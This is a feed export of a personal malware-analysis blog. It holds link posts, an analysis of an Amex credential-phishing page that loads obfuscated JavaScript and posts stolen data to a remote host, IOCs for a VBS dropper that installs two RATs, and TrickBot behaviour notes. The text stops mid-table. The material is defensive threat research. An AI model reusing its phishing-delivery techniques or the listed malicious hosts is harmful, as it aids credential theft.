tag:blogger.com,1999:blog-12708381526417582912024-03-13T20:18:47.303-07:00RakshaTec...personal InfoSec blog by Vishal Thakur.Unknownnoreply@blogger.comBlogger110125tag:blogger.com,1999:blog-1270838152641758291.post-22277765750529557232018-10-11T15:56:00.000-07:002018-10-11T15:56:49.602-07:00Some more reports on my AZORult analysis<div dir="ltr" style="text-align: left;" trbidi="on">
https://cyware.com/news/new-azorult-variant-being-used-by-hacker-oktropys-to-spread-aurora-ransomware-6e5c7a5b<br />
<br />
https://threatravens.com/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/<br />
<br />
https://www.tecnoup.com.mx/como-se-introduce-un-malware-en-un-pdf/<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-1303087793746772482018-10-11T15:50:00.002-07:002018-10-11T15:50:43.631-07:00An in-depth malware analysis of QuantLoader by Vishal Thakur<div dir="ltr" style="text-align: left;" trbidi="on">
https://hk.saowen.com/a/c873d629bc59d277a3b02dc022a0a35bf66553b00b16fa55b8c9d26fd88daa3e</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-71762387405842426372018-10-11T15:49:00.000-07:002018-10-11T15:49:12.318-07:00AZORult campaign analysis by Vishal Thakur<div dir="ltr" style="text-align: left;" trbidi="on">
https://www.silobreaker.com/silobreaker-daily-cyber-digest-20-august-2018/</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-24203337417189058172018-10-11T15:48:00.000-07:002018-10-11T15:48:01.421-07:00AZORult Trojan Serving Aurora Ransomware by MalActor Oktropys<div dir="ltr" style="text-align: left;" trbidi="on">
https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-58482856599017438932018-10-11T15:35:00.000-07:002018-10-11T15:35:08.297-07:00MAJOR CHANGES IN EMOTET MALWARE<div dir="ltr" style="text-align: left;" trbidi="on">
Some of my work got picked up by third parties and was reported on.<br />
https://socprime.com/news/major-changes-in-emotet-malware/<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-90396463202686202692018-05-31T03:30:00.003-07:002018-05-31T03:30:28.793-07:00Malware analysis: decoding Emotet, part 1<div dir="ltr" style="text-align: left;" trbidi="on">
First part of my analysis of the Emotet Banking Malware is now available on the <a href="https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/" target="_blank">Malwarebytes Blog</a>.<br />
<br />
https://blog.malwarebytes.com/threat-analysis/2018/05/malware-analysis-decoding-emotet-part-1/</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-13043675858533782072018-05-15T13:36:00.002-07:002018-05-15T13:36:46.908-07:00Shodan IOC ingestion into ThreatConnect<div dir="ltr" style="text-align: left;" trbidi="on">
Added the scripts to ingest IOC downloaded from Shodan into ThreatConnect.<br />
<br />
https://github.com/vithakur/shodan-tools</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-90048309075284988852018-04-28T08:31:00.000-07:002018-04-28T08:40:39.306-07:00Amex Phishing Campaign, JS encoded in htm file | April 2018 <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's take a look at this new credSteal phishing campaign that is actively targeting users globally currently. The campaign has been carefully crafted and the JS delivery method is clever (although seen widely before as well). </div>
<div class="separator" style="clear: both; text-align: left;">
The entire page is presented off the back of the Document.write function from the JS code that is called in by the initial html. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The malicious JS is not being detected as malicious by any AV engine at the time of this post (SHA-256: <span style="color: #333333; font-family: "forosans" , "helvetica" , sans-serif; font-size: 14px; white-space: nowrap;">21e9e71186e3bc725c4bf88da1192eff25335a408a5aede56787a3295df501d3). </span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Pretty neat - let's take a look. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here's the phish that comes in: </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglFgREwLGOVXbMSEehB2unP5oRalAH1AQKJWlTrWiAP0hAdythdQ06sY_bGMAUgNmQzTO7nzqGa1BkwNOBYU19C2_XXtaO8C9IfoQQEDH5U573eu7tcMtUHWDlH63Eta0OXpVmL4epCVXm/s1600/Screen+Shot+2018-04-28+at+1.34.06+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1009" data-original-width="1414" height="456" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglFgREwLGOVXbMSEehB2unP5oRalAH1AQKJWlTrWiAP0hAdythdQ06sY_bGMAUgNmQzTO7nzqGa1BkwNOBYU19C2_XXtaO8C9IfoQQEDH5U573eu7tcMtUHWDlH63Eta0OXpVmL4epCVXm/s640/Screen+Shot+2018-04-28+at+1.34.06+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There's the htm attachment, which the user is directed to download to disk and then launch locally (no call-out required):</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkyBi_XUZCVAu5tNSb7wxf9HyvH31lQXoS6tY3GG2w2LAg1ISEzmdSXtF0QVZjh0Om-LoAxRleHhVrDwSbnTUkOM6FNRy6emhfyCEIof614FyKQ6lfkg93HorTLsfYsC1Oyir-eoiIB4Aa/s1600/Screen+Shot+2018-04-28+at+1.34.14+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="366" data-original-width="384" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkyBi_XUZCVAu5tNSb7wxf9HyvH31lQXoS6tY3GG2w2LAg1ISEzmdSXtF0QVZjh0Om-LoAxRleHhVrDwSbnTUkOM6FNRy6emhfyCEIof614FyKQ6lfkg93HorTLsfYsC1Oyir-eoiIB4Aa/s320/Screen+Shot+2018-04-28+at+1.34.14+am.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Let's take a look at the html code:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9xDONN3SnnN7LjvpxUkAoS_T-nYX5u86RFXLW_YAxUbgJEDJTUsUkIkif5pxxOrFcRBC6dS6HPwbbxN4cxE3Kt5NRVXLvFlwx5KokzFNsMAIYD3KGxp7ArBIC1GxGREN5K7shjYzpnwx8/s1600/Screen+Shot+2018-04-28+at+1.34.25+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1600" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9xDONN3SnnN7LjvpxUkAoS_T-nYX5u86RFXLW_YAxUbgJEDJTUsUkIkif5pxxOrFcRBC6dS6HPwbbxN4cxE3Kt5NRVXLvFlwx5KokzFNsMAIYD3KGxp7ArBIC1GxGREN5K7shjYzpnwx8/s640/Screen+Shot+2018-04-28+at+1.34.25+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see above, the HTML is simply calling the JS script, which is hosted externally. Upon execution, this script will load the entire fake HTML page that will submit user-input to the C2. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Let's take a quick look at the code from swf.js - it is important not to get over-whelmed by the code here. It may look a bit too much, but is quite easy to decode. All we need to do is change one function in the code and it'll sing to our tune!</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xq1PW1UTloGn9bbdulGB63Bvv_ga-iTPD7A4xMKxeXlXfgRSwdUzLIW3UwdMMuj99RDWqFRs2ZVNtx7CEmQin-TGZbNPd49U9op-hLm4UgyBP9jp0TTPcutIltOIPz22UR1TeIhtTbH3/s1600/Screen+Shot+2018-04-28+at+1.38.09+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="991" data-original-width="1600" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xq1PW1UTloGn9bbdulGB63Bvv_ga-iTPD7A4xMKxeXlXfgRSwdUzLIW3UwdMMuj99RDWqFRs2ZVNtx7CEmQin-TGZbNPd49U9op-hLm4UgyBP9jp0TTPcutIltOIPz22UR1TeIhtTbH3/s640/Screen+Shot+2018-04-28+at+1.38.09+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But first, let's take a look at the HTML file that is downloaded from the phishing email. As always, they try to steal as much PI as possible (even the email account with password). When opened in a browser, this is what it looks like:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDMHPy4n_kZRQElvYxY7zRPr3vJJ-yxDqRm_BeB_4NRl8FXchBR3fGsa4dOHKqmrbhyphenhyphenSZ3dUHQjnCeU8CzivSdQjkL2Ih1ATzXHdcOHoYRG-GMQ5Ay6IczXZp0xGuhgLpZEEbkc0Rr-O-/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1283" data-original-width="1600" height="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDMHPy4n_kZRQElvYxY7zRPr3vJJ-yxDqRm_BeB_4NRl8FXchBR3fGsa4dOHKqmrbhyphenhyphenSZ3dUHQjnCeU8CzivSdQjkL2Ih1ATzXHdcOHoYRG-GMQ5Ay6IczXZp0xGuhgLpZEEbkc0Rr-O-/s640/Capture.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WD1bPcPsEmNvkNQLnh7AOQtO8qSUOZUS_zwdQlxElS_UboqjmwwJIobGBqtr2Gg_p4rHn8mT9iRsX22QMeqceOG5flDLlbKrYkBe2h7Vq_nz1cJBq9Uz1q_cu9kb76MeFz7L7CE7db2J/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1239" data-original-width="1439" height="550" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WD1bPcPsEmNvkNQLnh7AOQtO8qSUOZUS_zwdQlxElS_UboqjmwwJIobGBqtr2Gg_p4rHn8mT9iRsX22QMeqceOG5flDLlbKrYkBe2h7Vq_nz1cJBq9Uz1q_cu9kb76MeFz7L7CE7db2J/s640/2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJj0MHKa6z0tMfZBvZDewJtpgqr3qUCVfrM28g6S8Z0M3L01l6muO2s9wF9ht-vUMFE-d3DuTgvetr0Ccx0MK391HmTmW29QtydoGFyUIetInovT7BL52vaQhK5iX25ONvBM9v5iVvWtJj/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1133" height="442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJj0MHKa6z0tMfZBvZDewJtpgqr3qUCVfrM28g6S8Z0M3L01l6muO2s9wF9ht-vUMFE-d3DuTgvetr0Ccx0MK391HmTmW29QtydoGFyUIetInovT7BL52vaQhK5iX25ONvBM9v5iVvWtJj/s640/3.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
When we inspect the form code, we can clearly see that the POST request goes to the collection engine hosted at "manoda.se" - this is where all the stolen information is sent to. </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyU1Pqw9ASvg2dY6WUmGxoMJFy5Fvo9paCmJJiPXTFw1iyhxd9HoCVXW1F83dI_G8sIp3rr1n6Qj-bZffRlGtg7laT5H-Yd2BjBcuWufNOYYyGQjQO1sr2P_s3nj3BnWLE2lCkUPr0cyKS/s1600/Screen+Shot+2018-04-28+at+1.46.13+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="72" data-original-width="936" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyU1Pqw9ASvg2dY6WUmGxoMJFy5Fvo9paCmJJiPXTFw1iyhxd9HoCVXW1F83dI_G8sIp3rr1n6Qj-bZffRlGtg7laT5H-Yd2BjBcuWufNOYYyGQjQO1sr2P_s3nj3BnWLE2lCkUPr0cyKS/s640/Screen+Shot+2018-04-28+at+1.46.13+am.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
And now, let's take a look at the function in the JS code that loads the entire fake page onto the browser. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTGswRocatMdAfVwCl4RJiTas6i2qhy-AxNCd2ZULD6a7-SqRVuNXBbBvxnaIvlTA2T_zLuPeKOyGy_AOwaLI8_QfO7eggLK09_vi54BK4PVa4UM8BBvSOAAuELOKnVA-_sPUg5uuDhjf/s1600/Screen+Shot+2018-04-29+at+1.12.17+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="138" data-original-width="1348" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTGswRocatMdAfVwCl4RJiTas6i2qhy-AxNCd2ZULD6a7-SqRVuNXBbBvxnaIvlTA2T_zLuPeKOyGy_AOwaLI8_QfO7eggLK09_vi54BK4PVa4UM8BBvSOAAuELOKnVA-_sPUg5uuDhjf/s640/Screen+Shot+2018-04-29+at+1.12.17+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once the loop has been executed, the value of var x is ready to be executed. In this case, 'document.write' is used to convert the code into HTML and display it in the browser. Using this JS code itself, we can get the script to decode and display the entire obfuscated code.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The simple trick is to change the 'document.write' to 'WScript.echo' - that's it. Run the script, it'll simply display the entire de-coded HTML in a pop-up window. You can also output the result into a text file using CScript. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFzgECjmcHx68IIEc5EQKPyILs11IrTG-Mcp2OjoeSRy49qx_JSxAnZXr00SSe5Vs70tsDJqQTbltmBXc_uERZlEfKVSUsxPrUSE-RFIjgKXAL_4rK6DPgMK_GddYNz3TTcIPpuF9rmCRN/s1600/Screen+Shot+2018-04-28+at+1.57.06+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1568" data-original-width="1600" height="626" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFzgECjmcHx68IIEc5EQKPyILs11IrTG-Mcp2OjoeSRy49qx_JSxAnZXr00SSe5Vs70tsDJqQTbltmBXc_uERZlEfKVSUsxPrUSE-RFIjgKXAL_4rK6DPgMK_GddYNz3TTcIPpuF9rmCRN/s640/Screen+Shot+2018-04-28+at+1.57.06+am.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The delivery method has been around for a while now - it surely helps with not having to go through the proxy/firewall for at least one step. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<i>Here are some usable/actionable details:</i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
FileName: swf.js</div>
<div class="separator" style="clear: both; text-align: left;">
SHA-256: 21e9e71186e3bc725c4bf88da1192eff25335a408a5aede56787a3295df501d3</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.virustotal.com/#/file/21e9e71186e3bc725c4bf88da1192eff25335a408a5aede56787a3295df501d3/detection" target="_blank">VirusTotal link</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
https://justforgame[.]it/vserv/swf.js</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
http://www.manoda[.]se/socket/license/lib/etc/spoof.php</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-70488335660581406762018-04-10T03:45:00.002-07:002018-04-16T14:41:20.513-07:00Malware Alert: Schneiken Double Dropper <div dir="ltr" style="text-align: left;" trbidi="on">
<b>** UPDATE **</b><br />
<i>I have now published a full analysis of this malware. As of now, (17 APR 2018) there is still no AV detecting it successfully and there is no name for it so I'm going with 'Schneiken'. </i><br />
<br />
There is a new malware actively being served through phishing campaigns at the time of this post.<br />
<br />
This is the Schneiken dropper - which is an interesting malware, written in VBS and comes with multiple layers of code obfuscation. It drops TWO RATs on the victim's disk - the Duhini RAT and the RATTY JRAT. Both RATs are embedded into the vbs dropper.<br />
<br />
I'll be posting a detailed analysis of this malware soon and will update this post with the link to that.<br />
<br />
Here are the details in the meantime:<br />
<br />
Flow:<br />
Phish > HREF > PDF > HREF > ZIP > VBS > JRAT + Duhini RAT<br />
<br />
MD5: 47f21544a7479cae3e20488731ba6aa6<br />
SHA256: d5f56058608f8dabb9d19c432c751f99f994edd056b2846ac51915258494598a<br />
Filename: TT COPY.vbs <br />
<br />
JRAT that is being dropped by this malware:<br />
<br />
RATTY.jar<br />
MD5: 9b93c76d2dacf7adaacfc1e99dae8089<br />
<br />
Deobfuscated/Decoded files: https://github.com/vithakur/schneiken<br />
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-40360539827868900762018-04-04T15:24:00.001-07:002018-04-04T15:24:17.226-07:00An in-depth malware analysis of QuantLoader<div dir="ltr" style="text-align: left;" trbidi="on">
Published this article on QuantLoader, if interested, have a <a href="https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" target="_blank">read here</a>:<br />
<br />
https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-28869160751546352092018-02-28T22:40:00.001-08:002018-02-28T22:40:10.791-08:00Olly Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
https://drive.google.com/file/d/1g_SOOq1g24KzmmKfb39RruMA9AxAQSsc/view?usp=sharing</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-7669629578800184232018-01-10T01:19:00.001-08:002018-01-10T01:19:31.718-08:00Python - useful links<div dir="ltr" style="text-align: left;" trbidi="on">
http://timgolden.me.uk/python/wmi/cookbook.html<br />
<h2 style="text-align: left;">
wmi Cookbook</h2>
These examples assume you are using the WMI module from this site. The following are examples of useful things that could be done with this module on win32 machines. It hardly scratches the surface of WMI, but that’s probably as well.<br /><br />The following examples, except where stated otherwise, all assume that you are connecting to the current machine. To connect to a remote machine, simply specify the remote machine name in the WMI constructor, and by the wonders of DCOM, all should be well:<br /><br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-12878708822066497372017-12-18T00:51:00.000-08:002017-12-18T00:52:20.864-08:00Malware - TrickBot Analysis December 2017<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
What's new:</h2>
<div style="text-align: left;">
New Execution flow - directory structure has changed.</div>
<div style="text-align: left;">
Instead of the winapp folder, you need to look for this:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
C:\Users\me\AppData\Roaming\services\</div>
<div style="text-align: left;">
C:\Users\me\AppData\Roaming\services\Modules</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
And of course, new icon :)</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWeSRGJgvPWu4B5As250RhKbqtlubX4PwshUx_GDKCelq0jqYHnzMJQdbyovbmsCy8wDlRZgpV6vhcfMqbtXFWV2AagKNnzwkOBgM1QpidYNSXkiIA83YTmrP7VRCFON8mBqOJfVedLkl/s1600/trk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="90" data-original-width="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlWeSRGJgvPWu4B5As250RhKbqtlubX4PwshUx_GDKCelq0jqYHnzMJQdbyovbmsCy8wDlRZgpV6vhcfMqbtXFWV2AagKNnzwkOBgM1QpidYNSXkiIA83YTmrP7VRCFON8mBqOJfVedLkl/s1600/trk.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
Identifiers:</h2>
<br />
Microsoft Visual Basic v5.0/v6.0<br />
<br />
Imports:<br />
MSVBVM60.DLL - 70 functions<br />
<br />
1 VERSIONINFO<br />
FILEVERSION 5,0,0,0<br />
PRODUCTVERSION 5,0,0,0<br />
FILEOS 0x4<br />
FILETYPE 0x1<br />
{<br />
BLOCK "StringFileInfo"<br />
{<br />
BLOCK "040904B0"<br />
{<br />
VALUE "CompanyName", "Thadickatt House"<br />
VALUE "FileDescription", "Pil, ecco quanto produce il Sistema Umbria"<br />
VALUE "LegalCopyright", "Copyright © 2017 - DUESSE COMMUNICATION S.r.l"<br />
VALUE "LegalTrademarks", "Edah, should not be confused with the Haredi communal body in Israel known as the Edah"<br />
VALUE "ProductName", "Thadickat"<br />
VALUE "FileVersion", "5.00"<br />
VALUE "ProductVersion", "5.00"<br />
VALUE "InternalName", "Thadickat"<br />
VALUE "OriginalFilename", "Thadickat.exe"<br />
}<br />
}<br />
<br />
BLOCK "VarFileInfo"<br />
{<br />
VALUE "Translation", 0x0409 0x04B0 <br />
}<br />
}<br />
<br />
<br />
<h2 style="text-align: left;">
FLOW:</h2>
<h2 style="text-align: left;">
<style type="text/css"><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}--></style></h2>
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: none; font-family: arial,sans,sans-serif; font-size: 10pt; table-layout: fixed; width: 0px;"><colgroup><col width="171"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col></colgroup><tbody>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Load Image "}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Load Image </td><td data-sheets-value="{"1":2,"2":"C:\\Windows\\SysWOW64\\kernel32.dll"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Windows\SysWOW64\kernel32.dll</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Load Image"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Load Image</td><td data-sheets-value="{"1":2,"2":"C:\\Windows\\SysWOW64\\KernelBase.dll"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Windows\SysWOW64\KernelBase.dll</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
HKLM\System\CurrentControlSet\Control\Terminal Server</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\Software\\Wow6432Node\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 499px;">
<div style="float: left;">
HKLM\Software\Wow6432Node\Policies\Microsoft\Windows\Safer\CodeIdentifiers</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Load Image"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Load Image</td><td data-sheets-value="{"1":2,"2":"C:\\Windows\\SysWOW64\\apphelp.dll"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Windows\SysWOW64\apphelp.dll</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Disable8And16BitMitigation"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
